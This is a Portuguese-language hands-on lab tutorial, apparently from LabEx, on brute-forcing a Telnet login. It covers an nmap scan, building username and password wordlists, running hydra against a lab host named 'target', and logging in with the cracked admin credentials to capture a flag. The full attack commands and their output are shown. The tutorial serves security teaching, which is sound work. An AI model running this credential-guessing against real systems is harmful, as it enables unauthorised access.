Força Bruta em Telnet e Credenciais Fracas

LinuxBeginner
Pratique Agora

Introdução

Bem-vindo a este laboratório prático focado em segurança de senhas e ataques de força bruta. Muitas violações de segurança ocorrem não por causa de exploits de software complexos, mas devido a credenciais simples, fracas ou padrão. Um ataque de força bruta é um método automatizado de tentar inúmeras combinações de nome de usuário e senha até que a correta seja encontrada.

Neste laboratório, você simulará um ataque a um sistema com um serviço Telnet vulnerável protegido por uma senha fraca. Você usará ferramentas padrão de testes de penetração para realizar reconhecimento, preparar o ataque e executá-lo. Você começará verificando a conectividade, escaneando o alvo com nmap e, em seguida, usando hydra, uma popular ferramenta de quebra de senhas, para descobrir as credenciais de login. Finalmente, você usará as credenciais descobertas para acessar o sistema e capturar uma flag.

Ao concluir, você entenderá como:

  • Verificar a conectividade de rede usando ping.
  • Usar nmap para confirmar que um serviço específico está em execução.
  • Criar listas de palavras (wordlists) para um ataque de força bruta.
  • Usar hydra para realizar um ataque de força bruta contra um serviço Telnet.
  • Obter acesso a um sistema usando credenciais comprometidas.

Vamos começar.

Este é um Lab Guiado, que fornece instruções passo a passo para ajudá-lo a aprender e praticar. Siga as instruções cuidadosamente para completar cada etapa e ganhar experiência prática. Dados históricos mostram que este é um laboratório de nível iniciante com uma taxa de conclusão de 85%. Recebeu uma taxa de avaliações positivas de 100% dos estudantes.

Verificar Conectividade com o Alvo usando Ping

Nesta etapa, você começará confirmando que sua máquina de ataque pode se comunicar com o sistema alvo. O comando ping é uma ferramenta básica de diagnóstico de rede que envia uma solicitação para um host alvo e aguarda uma resposta, confirmando sua alcançabilidade.

Seu ambiente inclui um sistema alvo acessível com o nome de host target. Para garantir que ele esteja online e responsivo, execute o seguinte comando em seu terminal. O sinalizador -c 4 instrui o ping a enviar exatamente quatro pacotes.

ping -c 4 target

Você deverá ver uma resposta semelhante à abaixo. Isso confirma que o alvo está online e sua conexão de rede está estável. O endereço IP e os tempos de resposta podem diferir ligeiramente.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

Com a conectividade confirmada, você está pronto para prosseguir com o escaneamento do alvo.

Escanear Portas Abertas com Nmap

Nesta etapa, você usará o nmap para escanear o alvo em busca de portas abertas e serviços em execução. Esta é uma parte crítica do reconhecimento, pois ajuda a identificar potenciais pontos de entrada. Suspeitamos que um serviço Telnet esteja em execução, que normalmente usa a porta 23.

Para confirmar isso, execute um escaneamento nmap direcionado. O sinalizador -p 23 foca o escaneamento especificamente na porta Telnet.

Execute o seguinte comando em seu terminal:

nmap -p 23 target

A saída mostrará o status da porta especificada. Você deverá ver um resultado semelhante a este:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 14:10 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00040s latency).

PORT   STATE SERVICE
23/tcp open  telnet

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

A saída confirma que a porta 23/tcp está open (aberta) e executando um serviço telnet. Este é o serviço que visaremos na próxima etapa.

Conectar ao Alvo via Telnet com Brute Force

Nesta etapa, você realizará um ataque de força bruta contra o serviço Telnet usando o hydra. Como não sabemos a senha, forneceremos ao hydra listas de nomes de usuário e senhas potenciais para tentar automaticamente.

Primeiro, crie duas wordlists simples. Uma para nomes de usuário (users.txt) e uma para senhas (pass.txt). Incluiremos candidatos comuns e prováveis.

Crie a lista de nomes de usuário:

echo -e "admin\nuser\nroot" > users.txt

Crie a lista de senhas:

echo -e "password\nadmin\n123456" > pass.txt

Agora, use o hydra para lançar o ataque. O sinalizador -L especifica a lista de usuários, -P especifica a lista de senhas, e telnet://target define o protocolo e o host a serem atacados.

hydra -L users.txt -P pass.txt telnet://target

O hydra tentará fazer login com todas as combinações de nome de usuário e senha de suas listas. Após alguns momentos, ele encontrará as credenciais corretas e as exibirá.

Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-19 14:11:54
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking telnet://target:23/
[23][telnet] host: target   login: admin   password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-19 14:11:57

A saída mostra claramente que um login válido foi encontrado: nome de usuário admin com senha 123456.

Explorar Sistema Alvo e Localizar Flag

Nesta etapa, você usará as credenciais descobertas pelo hydra para fazer login no sistema alvo e encontrar a flag. Esta é a fase final do ataque, onde você atinge seu objetivo.

Conecte-se ao alvo usando o cliente telnet:

telnet target

O sistema solicitará um login. Insira o nome de usuário admin e pressione Enter. Em seguida, quando solicitado a senha, insira 123456 e pressione Enter.

Trying 172.17.0.2...
Connected to target.
Escape character is '^]'.

Linux 5.15.0-56-generic (target) (pts/0)

target login: admin
Password:

Após o login bem-sucedido, você será apresentado a um prompt de shell. Você está agora dentro do sistema alvo.

Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-56-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Fri Sep 19 06:11:55 UTC 2025 from 172.17.0.1 on pts/0
admin@target:~$

Agora, liste o conteúdo do diretório atual (/home/admin) para encontrar a flag.

ls -la

Você verá o arquivo flag.txt na listagem.

admin@target:~$ ls -la
total 28
drwxr-xr-x 3 admin admin 4096 Sep 19 06:11 .
drwxr-xr-x 1 root  root  4096 Sep 19 06:08 ..
-rw-r--r-- 1 admin admin  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 admin admin 3771 Feb 25  2020 .bashrc
drwx------ 2 admin admin 4096 Sep 19 06:11 .cache
-rw-r--r-- 1 admin admin  807 Feb 25  2020 .profile
-rw-r--r-- 1 admin admin   33 Sep 19 06:08 flag.txt

Finalmente, use o comando cat para ler o conteúdo de flag.txt.

cat flag.txt

O terminal exibirá a flag.

admin@target:~$ cat flag.txt
labex{w34k_p4ssw0rd_brut3f0rc3d}

Parabéns! Você realizou com sucesso o brute-force do serviço Telnet e capturou a flag. Copie o valor da flag para completar o laboratório. Para sair da sessão, digite logout e pressione Enter.

Resumo

Neste laboratório, você executou com sucesso um ataque de força bruta contra um serviço Telnet. Você aprendeu uma abordagem sistemática para comprometer um sistema com credenciais fracas.

Você praticou como:

  • Confirmar a alcançabilidade da rede com ping.
  • Usar nmap para verificar se um serviço específico está ativo em uma porta alvo.
  • Criar wordlists de nomes de usuário e senhas simples, mas eficazes.
  • Empregar hydra para automatizar o processo de tentativa de combinações de login e identificar credenciais válidas.
  • Usar as credenciais comprometidas para fazer login, explorar o sistema alvo e recuperar uma flag.

Este exercício demonstra um risco de segurança fundamental: o uso de senhas fracas e fáceis de adivinhar. Ele também destaca o perigo de usar protocolos não criptografados como o Telnet, que expõem credenciais à escuta de rede. As habilidades que você aprendeu são essenciais tanto para hackers éticos que testam as defesas do sistema quanto para administradores de sistema que devem protegê-los.